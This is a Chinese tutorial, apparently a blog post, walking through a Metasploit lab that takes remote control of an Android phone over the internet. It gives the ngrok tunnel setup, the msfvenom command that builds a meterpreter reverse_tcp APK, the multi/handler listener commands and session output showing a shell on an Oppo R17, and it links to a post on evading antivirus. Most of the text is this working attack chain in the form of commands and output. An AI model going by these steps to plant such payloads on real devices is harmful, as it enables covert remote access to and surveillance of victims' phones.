一。测试环境:

    实验环境:kali下Metasploit,kali无线网络环境1(外网180.91.xx.xx,内网:192.168.0.XX):

    安卓手机:oppo R17.无线网络环境2(外网180.80.xx.xx,内网:192.168.1.XX):

 

   思路:制作payload,攻击,映射端口

二、准备:一个ngrok帐号。

    2.1没有可以去注册:https://www.ngrok.cc/login/register,选择免费的隧道,协议选择TCP ,如下图结果:

Metasploit实验:android内网的反弹控制

    2.2注册好帐号,在下载对应的客户端,我选择的是64位的系统,下载运行。

 

Metasploit实验:android内网的反弹控制

cd /root/下载/linux_amd64/
./sunny clientid 0159XX8b07aXXXXX  //隧道id

运行NGROK后提示下列信息:

Sunny-Ngrok   官 网 www.ngrok.cc+C 退 出 )

Metasploit实验:android内网的反弹控制
                                          
Tunnel Status                
online 
 

免费的要多连几次,也可以购买1个月的玩一下,才10大洋!

三、生成payload

运行

     msfvenom -p android/meterpreter/reverse_tcp lhost=free.XXXXX.com lport=11009 R > /home/fandan.apk

红色部分换成你申请的服务器地址和服务器对应的端口,一定要记得!

结果显示如下:

[-] No platform was selected, choosing Msf::Module::Platform::Android from the payload
[-] No arch selected, selecting arch: dalvik from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 10191 bytes

要是 免杀可以参考上一篇文章:https://blog.csdn.net/wjwqp/article/details/105420153

生成不了要确认服务端口和隧道ID是否正确

四、启动msfconsole,运行:

use exploit/multi/handler
set payload android/meterpreter/reverse_tcp //选择Payload
set lhost 192.168.0.XX
exploit

五、把fandan.apk上传到安卓Oppo手机。

 

msf5 exploit(multi/handler) > exploit

[*] Started reverse TCP handler on 192.168.0.XX:11009
[*] Sending stage (73548 bytes) to 192.168.0.XX
[*] Meterpreter session 2 opened (192.168.0.XX:11009 -> 192.168.0.XX:41230) at 2020-04-11 20:39:23 +0800

meterpreter > sysinfo
Computer    : localhost
OS          : Android 9 - Linux 4.9.112-perf+ (aarch64)
Meterpreter : dalvik/android
meterpreter >ipconfig  //  查看oppo的ip地址

Metasploit实验:android内网的反弹控制


 

 

好了,现在可以在msf下对appo手机进行访问了。

本实验到此结算

 

相关文章: